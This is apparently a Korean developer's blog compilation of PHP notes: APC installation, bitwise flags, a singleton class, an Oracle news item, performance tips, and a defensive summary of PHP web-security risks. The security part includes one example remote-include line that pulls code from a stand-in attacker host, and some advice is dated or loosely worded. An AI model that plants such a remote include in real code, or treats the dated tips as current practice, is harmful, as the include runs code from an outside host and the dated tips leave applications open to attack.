제가 테스트한 샘플 코드 입니다. APC 추가 하기 (php 5.2.6 이랑 apache 2.2.9 입니다.)
1. /home/php/bin/pecl download apc 2. tar -xvzf APC-3.0.19.tgz 3. cd APC-3.0.19 4. /home/php/bin/phpize 4. ./configure --enable-apc-mmap --with-apxs=/home/apache/bin/apxs --with-php-config=/home/php/bin/php-config 5. make 6. make install 이렇게 하시면 기본적으로 php 의 extension 모듈 위치로 복사 됩니다. 7. 또는 이렇게 하셔도 됩니다. cp ././libs/apc.so /usr/local/lib 이 부분도 역시 php extension 위치로 복사해서 넣으시면 됩니다. 8. php.ini 수정하기 extension_dir=설정한위치로적용하세요. 예) /home/php/lib/php/extensions/no-debug-zts-20060613/apc.so 가 있습니다. extension_dir=/home/php/lib/php/extensions extension="no-debug-zts-20060613/apc.so" 이렇게 넣으시면 됩니다. dir 은..적절히 조절 하시면 됩니다. enble_dl=on
php 설치 과정과 비슷 합니다. 보시면 아시겠지만 make install 과정 빼고 동일하죠. make 하면 실제 build 까지 다 해주니 우리는 그냥 필요한 확장 모듈을 extension 에 복사 해주고 설정만 잡아 준 후 apache restart 시키면.. 끝.. ^^*
1. $ pecl install extname-beta 2. $ cd extname
$ phpize
$ ./configure
$ make
# make install
사용자가 옵션을 선택해 보죠.. 글을 공개 하고 검색에 노출하고 싶다 binary : 1001 decimal : 9 그럼 실제 코딩 단계에서는 어떻게 이런 값을 얻을수 있을까요? 일반적으로 글에 대한 default 값이 존재 합니다. default 를 공개로만 설정하고 나머지는 사용자가 선택 해야 한다고 가정 하도록 하죠.
위와 같이 16가지의 옵션이 존재 할 수 있겠죠.. 이들에 대한 표현을 하기 위해서 bitwise operators 를 사용 하는 것이지요.. 0000 : 전체 비공개 0001 : 공개 0010 : 친구만 공개 0011 : 공개및 친구도 공개 (사실 예가 좀 안좋내요..ㅡㅡ^ 이점 너그럽게 이해해 주시길.. ^^;) 1001 : 공개 하고 검색에도 등록 (이 예가 더 좋내요.. ^^;) .... 1111 : 전체 공개
flag |= bitOpen (0001) flag |= bitFriend (0010) flag |= bitReader (0100) flag |= bitSearch (1000) 등등..
bitOpenY = flag | bitOpen bitOpenN = flag & bitOpen bitFriendY = flag | bitFriend bitFriendN = flag & bitFriend // 글 공개 이나 친구에게는 비공개로 선택 result = bitOpenY | bitFriendN (0001) 이거 뭐 그냥.. bitOpen 만 쓰면 되지 이걸 왜 연산까지 하냐 그러시겠지만 아주 초 간단 예를 들어서 그렇게 보일수 있는 거구요. 2^^N 개의 옵션이 있는 경우 이 bitwise operators 는 정말 유용하게 사용 됩니다.
그냥 기초 이니까.. 그 원리만 이해를 하시면 될듯 하내요.. ^^*
과거에도 쉽게 사용했던 방법은 주로 코드 테이블을 짜서 사용을 했었죠.. 아마도.. 각 단위별로 의미를 부여 하고.. 코드를 생성 하거나 특정 값에 의미를 부여 하는 식으루다가요..
rdbms 랑 script 랑 잘 만들어서 사용하면 퍼포먼스 도 그렇고 유지보수에도 좋은 결과가 나올 겁니다.. (늘 그렇듯이 잘 만들면.. ㅋ)
class singleton // ensure that only a single instance exists for each class. { function &getInstance ($class, $arg1=null) // implements the 'singleton' design pattern. { static $instances = array(); // array of instance names
if (array_key_exists($class, $instances)) { // instance exists in array, so use it $instance =& $instances[$class];
} else { // load the class file (if not already loaded) if (!class_exists($class)) { switch ($class) { case 'date_class': require_once 'std.datevalidation.class.inc'; break;
case 'encryption_class': require_once 'std.encryption.class.inc'; break;
case 'validation_class': require_once 'std.validation.class.inc'; break;
default: require_once "classes/$class.class.inc"; break; } // switch } // if
// instance does not exist, so create it $instances[$class] = new $class($arg1); $instance =& $instances[$class]; } // if
뭐 위에 다른 글에서도 설명 되어 있지만 어떤 language 로 구현을 하던 최대 N 개로 제한 되어 지는 극한까지는 1개로 제한 되어 지는 객체를 생성 하는 패턴 방식입니다.
더 쉽게 설명 하자면 그냥 global class ,variable 또는 static 이라고도 할 수도 있겠죠. 물론 의미적으로 통할 수 있다는 설명 입니다. 근데 뭐 쉽게 이해 하는데 이 정도면 되지 않나 싶기도 하구요.. ^^* 전 어려운 용어나 개념은 별로 좋아라 하지 않아서.. ㅎㅎ
--> 기사 원문 오라클이 10일(미국시간) 업그레이드된 PHP용 오라클 콜 인터페이스(OCO8) 강화 및 프리뷰를 발표했다.
강화한 드라이버 OCI8은 웹 서버 여러 대에 서버측 접속 풀을 허용하며, 오라클은 이를 통해 웹 상에서 개인용 홈페이지 개발에 사용되는 프로그래밍 언어인 PHP에 주력하는 애플리케이션에 향상된 확장성과 가용성, 호환성을 제공할 것으로 예상하고 있다.
서버가 맞춤 웹 페이지를 작성할 수 있는 오픈소스 소프트웨어인 기존의 PHP 애플리케이션은 코드를 변경하지 않고 새로운 접속 풀링을 이용할 수 있을 것이다.
오라클 제품 개발 담당 수석이사 존 디브는 OCI8은 "온갖 유형의 데이터에 접근하기 위해 언제든지 신속히 온라인에 접속할 수 있는 사용자 수를 확대해야 할 필요성"을 다루고 있으며, 이와 같은 수요는 "크게 늘었고 이에 따라 PHP와 같은 기술 의존도도 늘었다"고 말했다.
As you can see, a require_once was performed and inside that a php_self was executed. Then another require_once executed session_is_registered, followed by another require_once and so on. Basically, the function call tree is like a little window into the Zend Engine, allowing you to watch the sequence of events that take place when your Web application is run.
If you do much object-oriented development, you may find that you rapidly lose track of what's actually going on inside some classes and methods. It's tempting to think of classes as a black box, because that's how we're taught to use them. But, when optimizing a complex Web application, you need to know what's actually going on inside each one, or you may have performance bottlenecks you do not even notice.
Avoid repeated function calls
for ( $i=0; $i<count($aArray); $i++ ) {} : bad
$nCnt = count($aArray); for ( $i=0; $i<$nCnt; $i++ ) {} : good
string concatenation
sprintf 보다 plain string concatenation 이 두배 정도 빠르다.
print() 대신 echo 를 사용 하라.
string 표현은 signle quotes 를 사용 하라.
Reduces Number Of System Calls (Optimizes PHP<->OS Communication)
html 폼에서 GET 대신에 POST를 사용하고 폼 처리 로직에서는 $_REQUEST 대신 $_POST를 사용한다.
중요한 처리에 대해서는 사용자가 요청한 것이 맞는지 확인을 요청한다.
NOTE : 처리를 수행하는 모든 폼은 POST 요청방식을 사용해야 하며 RFC 2616의 9.11 절을 보면 이를 다음과 같이 기술하고 있다. "특히, GET과 HEAD 요청방식은 정보 질의 이외의 처리에 대해서는 사용하지 않아야 한다는 관례가 정착되어 있다. GET 과 HEAD 요청방식은 '안전한' 것으로 간주 되어야 한다. GET 과 HEAD 요청방식을 안정한 것으로 간주하면 사용자 에이전트는 POST, PUT, DELETE와 같은 요청방식들을 특별한 방식으로 구분할 수 있으면 사용자는 안전하지 않은 동작이 요청 되고 있다는 사질을 인지할 수 있게 된다"
폼 제출시 한 사용자에게만 유효한 토큰을 생성 하여 유효성을 검사한다.
토큰의 유효 기간도 설정을 하여 공격에 대비를 할 수 있다.
공격자는 한 명의 사용자에게 제한할 수 있다.
그렇다고 POST 방식만 사용하려 해서는 안 된다.
폼 제출 스푸핑
가짜 폼을 조작해서 요청을 한다.
레퍼러를 사용해서 폼이 있는 URL 이 유효 한지 검사를 할 수 있으나 자제 하기 바란다.
HTTP 요청 스푸핑
공격자는 HTTP 요청을 조작하여 완전하게 제어할 수 있다.
telnet 을 이용해서 공격 가능함.
3. 데이터베이스와 SQL
데이터베이스에서 가져오는 모든 데이터를 반드시 필터링해야 하며 이스케이프해야 한다.
흔히 저지르는 실수는 SELECT 쿼리도 데이터베이스로 보내는 데이터라는 것을 잊어 버리는 것이다.
쿼리 자체도 웹 응용프로그램에서 데이터베이스로 보내는 출력이라는 것을 잊지 말아야 한다.
액세스 인증 정보 유출
웹서버 루트 안쪽에 인클루드 파일들을 저장하는 것은 위험을 자초한 셈이다.
웹서버(아파치)에서 .inc 파일에 대한 요청을 거부 하도록 설정할 수 있다.
< Files ~ "\.inc$" >
Order allow, deny
Deny from all
< /Files >
SQL 삽입 공격
취약점은 입력하는 데이터를 필터링하지 못하는 것과 데이터베이스에 보내는 데이터를 이스케이프하지 못하는 것 이다.
2004년 8월에 MD5에서 일부 해시가 충돌 한는 문제가 언급되었다.
MD5 암호화 알고리즘은 이미 완전히 깨졌다.
MYSQL 사용자라면 mysql_real_escape_string() 함수만 사용하면 된다.
만약 제공하지 않는다면 addSlashes() 를 사용할 수 있다.
바운드 매개변수를 사용하면 SQL 삽입 공격에 대해 가장 강력한 보호 수단을 갖춘 것이다.
4. 세션과 쿠키
쿠키 홈치기
쿠키 사용과 관련된 위험은 공격자가 사용자 쿠키를 훔칠 수 있다는 점이다.
예를 들어, 세션ID를 쿠키에 저장한다면 쿠키 노출에 의해 세션 하이재킹까지 가능하기 때문에 심각한 위험이 될수 있다.
세션 데이터 노출
session_set_save_handler() 를 사용해서 자신만의 세션 저장소를 작성하고, 세션 데이터를 저장할 때 암호화하고 가져올 때 해독하는 함수를 작성하는 것으로 쉽게 구현할 수 있다.
세션 고정
공격자는 유효한 세션ID를 얻기 위해 주로 세 가지 방법을 사용한다.
예측, 캡쳐, 고정
SSL 을 사용하고, 브라우저를 최신의 버전으로 유지하는 것으로 낮출 수 있다.
세션 하이재킹
요청들 속에서 일관성을 인식하고 일관되지 않은 행위에 대해서 의심스러운 것으로 다룬다. 하지만 proxy 를 통해서 위조 될수 도 있다.
보다 좋은 방법은 신분 확인의 두번째 형태로도 볼 수 있는 것으로 URL에 토큰을 전달하는 것이다.
URL 을 통해서 인클루드에 접근 할 수 있고 사용자 브라우저에 소스 코드가 표시될 수 있다.
모든 인클루드를 웹 서버 루트 바깥에 저장하는 것이 최선의 방법이다.
인클루드의 확장자를 .php 로 하는것, .inc 리소스에 대한 요청을 거부 하도록 아파치를 설정하는 방법 등이 있다.
백도어 URL
URL을 통한 직접 액세스를 의도하지 않았는데 URL을 통해서 직접 리소스에 액세스할 수 있는 것을 말한다.
파일 이름 조작
동적 인클루드를 사용해서 페이지의 동적인 부분을 캐시하는 것은 장점이 있지만 한편으로 공격자에게 어떤 캐시된 파일을 표시할지 선택할 수 있는 완벽한 기회를 제공하는 것이기도 하다.
동적 인클루드를 사용할 때 결코 오염된 데이터를 사용해서는 안 된다는 것이다.
코드 삽입 공격
allow_url_fopen 지시문의 사용은 돌려 주는 소스가 PHP 코드라고 상상해 보면, PHP 코드는 해석되고 실행될 수 있다.
include 'http://evel.sample.org/evil.inc'
6. 파일과 명령
파일 시스템 트래버스
오염된 데이터를 파일 이름의 일부로 사용할 때 취약점이 발생한다.
basename() 함수는 문자열에 원하지 않는 경로 정보가 포함되었는지 조사하는데 유용한 함수다.
원격 파일 위험
PHP 에서 allow_url_fopen 설정이 있으며 기본 값으로 설정되어 있다. 이 옵션이 설정되어 있으면 PHP에서는 다양한 리소스를 마치 로컬 파일처럼 참조할 수 있다. 이런 경우 공격자가 임의의 코드를 실행하는 것이 가능하기 때문에 PHP 응용프로그램이 가질 수 있는 가장 심각한 취약점으로 간주 된다.
항상 입력을 필터링 하고 파일 이름을 지정할 때는 필터링된 데이터만 사용해야 한다.
명령 삽입 공격
가능 하면 쉘 명령의 사용을 피할 것을 권한다. 쉘 명령을 사용해야 한다면 실행할 문자열을 구성하기 위해서 필터링된 데이터만 사용해야 하며 항상 실행 결과를 이스케이프해야 한다.
7. 인증과 권한 부여
무차별 공격
모든 가능성을 검토하는 공격을 말한다.
인증 시도를 제한 하거나 실패 횟수를 제한하는 것은 일반적으로 상당히 효과적인 보호 수단이지만 정상적인 사용자에게 불이익을 주지 않고는 공격자를 식별하고, 막을 수 없다는 딜레마가 존재한다.
무차별 공격이 통하지 않게 하기 위해 간단한 시간 지연을 사용할 수 있다.
로그인을 실패한 사용자가 15츠 이내에 시도하려고 하면 로그인 정보가 맞더라도 인증이 실패되는 것으로 출력한다.
인증 실패의 결과 화면은 항상 같아야 한다.
패스워드 스니핑
POST 방식의 SSL 사용을 권장한다.
리플레이 공격
정상적인 사용자가 액세스권한이나 특별한 권한을 얻기 위해 전송한 데이터를 공격자가 재전송하는 종류의 모든 공격을 뜻한다.
로그인 정보 기억
쿠키에 저장되는 정보는 인증에 사용될 수 있는 시간대가 제한되어야 한다.
쿠키는 1주일 또는 그 이하의 기간 안에 만료 되어야 한다.
쿠키는 오직 한 번의 인증에 대해서만 유효해야 한다.
일주일 또는 그 이하의 기간 안의 만료는 서버에서 강제 수행되어야 한다.
8. 공유 호스팅
소스 코드 유출
웹 서버 루트 바깥에 저장된 db.inc 파일이 있다고 하자.
이 문제에 대한 가장 좋은 해결책은 root만 읽을 수 있는 파일에 서버 환경 변수로 설정하여 액세스 하는 것이다.
chmod 600 db.conf
phpinfo() 같은 함수의 실행 결과를 공개적으로 액세스할 수 없게 해야 한다.
세션 데이터 유출
가장 좋은 해결책은 사용자 이름과 비밀번호로 보호되는 데이터베이스에 세션 데이트를 저장하는 것이다.
세션 삽입 공격
이 공격 유형은 웹 서버가 세션 데이터 저장소에 대해 읽기 권한 뿐만 아니라 쓰기 권한도 있다는 사실을 이용한 것이다.
가장 좋은 해결책은 데이터베이스에 세션 데이터를 저장하는 것이다.
파일 시스템 브라우징
안전 모드
PHP 의 안전모드는 장벽을 높이는 역할을 하기 때문에 심층 방버 전략으로는 고려해볼 만하다.
include 실패시 warning 을 내고 script 는 진행이 되지만 require 는 fatal error 를 내고 정지 한다.
include 는 변수 scope 을 그대로 유지 한다.
function, class, defined 는 global scope 을 갖는다.
include() The include() statement includes and evaluates the specified file.
The documentation below also applies to require(). The two constructs are identical in every way except how they handle failure. They both produce a Warning, but require() results in a Fatal Error. In other words, use require() if you want a missing file to halt processing of the page. include() does not behave this way, the script will continue regardless. Be sure to have an appropriate include_path setting as well. Be warned that parse error in included file doesn't cause processing halting in PHP versions prior to PHP 4.3.5. Since this version, it does.
Files for including are first looked for in each include_path entry relative to the current working directory, and then in the directory of current script. E.g. if your include_path is libraries, current working directory is /www/, you included include/a.php and there is include "b.php" in that file, b.php is first looked in /www/libraries/ and then in /www/include/. If filename begins with ./ or ../, it is looked only in the current working directory.
When a file is included, the code it contains inherits the variable scope of the line on which the include occurs. Any variables available at that line in the calling file will be available within the called file, from that point forward. However, all functions and classes defined in the included file have the global scope.
require
실행중인 processing 을 중지 하고 싶을 때 사용한다.
상속을 사용하지 않을 때 사용한다.
looping 구조에 어떠한 행동도 하지 않는다.
loop 안에서 한번만 발생된다.
require() and include() are identical in every way except how they handle failure. They both produce a Warning, but require() results in a Fatal Error. In other words, don't hesitate to use require() if you want a missing file to halt processing of the page. include() does not behave this way, the script will continue regardless. Be sure to have an appropriate include_path setting as well.
require() will always attempt to read the target file, even if the line it's on never executes. The conditional statement won't affect require(). However, if the line on which the require() occurs is not executed, neither will any of the code in the target file be executed. Similarly, looping structures do not affect the behaviour of require(). Although the code contained in the target file is still subject to the loop, the require() itself happens only once.
+ 
invalid-file
invalid-file
